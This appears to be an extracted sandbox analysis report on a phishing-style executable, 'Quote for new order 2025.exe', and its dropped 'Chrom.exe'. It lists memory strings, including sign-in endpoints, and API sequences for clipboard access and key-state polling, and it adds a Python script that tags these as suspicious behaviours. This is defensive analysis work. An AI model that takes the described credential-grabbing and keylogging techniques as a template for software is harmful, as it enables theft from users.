Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv428D.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv428D.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv428D.tmp.14.dr | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                          Source: bhv428D.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                          Source: Chrom.exe, 00000004.00000002.1693924423.0000000000590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
Source: Chrom.exe, 00000004.00000003.1693528910.000000000098D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819462816.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000003.1818673130.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1901947564.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000003.1900947735.000000000084D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: bhv428D.tmp.14.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: Chrom.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: Chrom.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://www.office.com/
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0041138D OpenClipboard,GetLastError,DeleteFileW
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5E8F1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F5E8B0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_0759E8B0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState
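Two kinds of row appear above. The "String found" rows are almost all attributed to bhv1FE2.tmp and bhv428D.tmp, files that Chrom.exe itself wrote to the Temp directory (see the File created row further down), and their contents are Microsoft sign-in, Office and OneDrive URLs that look like the sandbox profile's own browser data rather than infrastructure of the sample; only the three strings attributed directly to Chrom.exe (Yahoo, Google and Live sign-in endpoints) say anything about the tool. The "Code function" rows carry the API-call sequences behind the clipboard and key-state-polling signatures. The script below is an added example, not part of this report or of Joe Sandbox's engine: it parses "Code function" rows in either the original table form or the fused form of this extracted page, strips the function id that the table repeats after the API list, and applies approximations of the heuristics the signature names imply. The rows are copied from this report; the tag names, the GetKeyState threshold and the ordered-subsequence rule are assumptions of the example.

```python
import re
from collections import Counter

# "Code function" rows copied from this report (sandbox PID numbering:
# 4 = Chrom.exe, 0/5/11 = Quote for new order 2025.exe). The last row repeats
# one of them in the fused form the extracted page uses, with the function id
# appended after the API list, to show the parser tolerates both forms.
REPORT_ROWS = [
    r"Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0041138D OpenClipboard,GetLastError,DeleteFileW",
    r"Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard",
    r"Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard",
    r"Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5E8F1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState",
    r"Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle",
    r"Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle",
    r"Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00409E39",
]

# Function id as Joe Sandbox prints it: <pid>_<stage>_<8 hex digits>.
FID = r"\d+_\d+_[0-9A-Fa-f]{8}"
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.*?)\s*\|?\s*Code function:\s*(?P<fid>" + FID + r")\s*(?P<apis>[\w,]*)"
)
FID_RE = re.compile("^" + FID + "$")

# Threshold for calling repeated GetKeyState use "polling" is an assumption of
# this example, not Joe Sandbox's internal value.
KEYSTATE_POLL_MIN = 3


def parse_row(line):
    """Split one report row into source, function id and the ordered API list."""
    m = ROW_RE.search(line)
    if not m:
        return None
    pid, stage, addr = m.group("fid").split("_")
    # Drop empty tokens and the repeated function id the table appends.
    apis = [a for a in m.group("apis").split(",") if a and not FID_RE.match(a)]
    return {"src": m.group("src"), "fid": m.group("fid"), "pid": int(pid),
            "stage": int(stage), "addr": int(addr, 16), "apis": apis}


def in_order(apis, *names):
    """True if every name appears in apis in the given order (gaps allowed)."""
    pos = 0
    for name in names:
        try:
            pos = apis.index(name, pos) + 1
        except ValueError:
            return False
    return True


def classify(apis):
    """Map an API call sequence to the behaviours the report's signatures name."""
    tags = set()
    if in_order(apis, "EmptyClipboard", "SetClipboardData"):
        tags.add("clipboard_write")
    if in_order(apis, "OpenClipboard", "GetClipboardData"):
        tags.add("clipboard_read")
    if Counter(apis)["GetKeyState"] >= KEYSTATE_POLL_MIN:
        tags.add("keystate_polling")
    if "NtQuerySystemInformation" in apis and "NtQueryObject" in apis:
        tags.add("handle_enumeration")
    if in_order(apis, "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"):
        tags.add("process_enumeration")
    return tags


def analyze(rows):
    """Parse all rows, de-duplicate by function id and attach behaviour tags."""
    result = {}
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        row["tags"] = sorted(classify(row["apis"]))
        result.setdefault(row["fid"], row)
    return result


if __name__ == "__main__":
    for fid, row in analyze(REPORT_ROWS).items():
        if row["tags"]:
            print(f"{fid} (PID {row['pid']}): {', '.join(row['tags'])}")
```

Run as a script it prints one line per tagged function; the untagged 4_2_0041138D shows why the heuristics look at call order rather than the mere presence of OpenClipboard.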

System Summary

Source: initial sample | Static PE information: Filename: Quote for new order 2025.exe
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0155C1B8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0155DBD0
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798A0D0
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798CE30
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798B8C8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798D8E8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_07989800
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_079894B8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_0798CE30
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_07984F08
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E064E8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E017D0
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E5F831
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E53A90
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E53A90
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 0_2_09E583B8
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044A030
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0040612B
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0043E13D
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044B188
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00442273
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044D380
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044A5F0
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_004125F6
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_004065BF
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_004086CB
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_004066BC
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044D760
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00405A40
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00449A40
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00405AB1
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00405B22
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044ABC0
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00405BB3
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00417C60
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044CC70
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00418CC9
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044CDFB
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044CDA0
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_0044AE20
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00415E3E
Source: C:\Users\user\Desktop\Chrom.exe | Code function: 4_2_00437F3B
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_0097AF08
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_0097C1B8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_0097DBD0
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F5F7F1
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F50458
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F57198
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F57A68
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F56E50
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F50458
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F863B0
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_06F81710
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_087B9830
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_087BA2E8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_087B82D8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_087B9830
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 5_2_087B4F08
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_02A5AF08
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_02A5C1B8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_02A5DBD0
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_02A5190C
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_0759F7F1
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_07590458
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_07597198
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_07597A68
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_07596E50
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_07590458
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_075C0FD8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_075C5E58
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_08C19830
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_08C182D8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_08C1A2E8
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_08C19830
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function: 11_2_08C14F08
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\Chrom.exe 53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
Source: C:\Users\user\Desktop\Chrom.exe | Code function: String function: 0044DDB0 appears 33 times
Source: C:\Users\user\Desktop\Chrom.exe | Code function: String function: 004186B6 appears 58 times
Source: C:\Users\user\Desktop\Chrom.exe | Code function: String function: 004188FE appears 88 times
Source: C:\Users\user\Desktop\Chrom.exe | Code function: String function: 00418555 appears 34 times
Source: Quote for new order 2025.exe, 00000000.00000002.3530691403.000000000345D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Quote for new order 2025.exe
Source: Quote for new order 2025.exe, 00000000.00000002.3529083783.000000000158E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Quote for new order 2025.exe
Source: Quote for new order 2025.exe, 00000005.00000002.3530288167.000000000256D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Quote for new order 2025.exe
